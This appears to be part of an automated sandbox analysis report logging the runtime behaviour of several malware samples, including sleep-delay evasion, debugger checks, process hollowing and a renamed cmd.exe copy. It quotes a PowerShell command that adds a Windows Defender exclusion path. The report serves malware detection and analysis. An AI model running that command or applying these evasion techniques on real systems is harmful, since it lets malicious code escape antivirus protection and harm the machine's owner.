Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99763s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99544s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98229s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97868s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97620s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97503s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97261s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -1199953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -1199843s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -1199734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -1199625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -1199515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -1199406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -1199296s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -1199187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7912	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8040	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A05908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02A05908

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99730	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99622	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99474	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99149	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98697	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98358	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97811	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97697	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97582	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97085	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96969	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96852	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99778	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99662	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99418	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99305	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99198	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99078	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98949	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98829	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98714	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98595	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98458	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98331	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98087	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97840	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97276	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97134	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199936	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199727	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99866
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99745
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99623
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99394
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99138
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98961
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98831
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98580
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98452
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98339
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98227
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98116
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97975
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97848
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97712
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97600
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97490
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99888
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99776
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99634
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99301
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98802
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98606
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98475
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98258
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98120
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97972
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97845
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97717
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97457
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199670
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199498
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199073
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198713
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198561
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198403
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198228
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198099
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197780
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197650
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197541
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197429
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197315
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197190
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197077
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196967
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196858
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196748
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196639
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196529
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196346
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196101
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195982
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195872
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195765
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195654
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195546
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195435
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195326
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195218
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195105
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1194999
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1194886
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1194780
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1194671
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99856
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99712
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99584
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99457
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99341
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99233
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99120
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99006
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98882
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98773
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98662
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98538
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98427
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98304
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98023
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97911
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97788
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97678
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97554
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99763
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99544
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99436
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99217
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99109
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98999
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98781
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98672
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98562
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98453
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98343
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98229
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98103
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97984
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97868
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97620
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97503
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97375
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97261
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199953
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199843
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199734
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199625
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199515
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199406
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199296
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199187
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: x.exe, 00000004.00000002.1509390491.0000000000609000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWz
Source: x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1509390491.0000000000609000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: Wisrysxl.PIF, 0000001A.00000002.1650786001.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 0000001E.00000002.1733160037.000000000065F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node			graph_4-38013
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	API call chain: ExitProcess graph end node			graph_26-27221

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A1F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_02A1F744

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A1894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02A1894C

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 12_1_004BF794 mov eax, dword ptr fs:[00000030h]		12_1_004BF794
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 27_1_004BF794 mov eax, dword ptr fs:[00000030h]		27_1_004BF794

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 12_1_004015D7 SetUnhandledExceptionFilter,	12_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 12_1_004015D7 SetUnhandledExceptionFilter,	12_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 27_1_004015D7 SetUnhandledExceptionFilter,	27_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 27_1_004015D7 SetUnhandledExceptionFilter,	27_1_004015D7

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 327008	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 346008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 386008

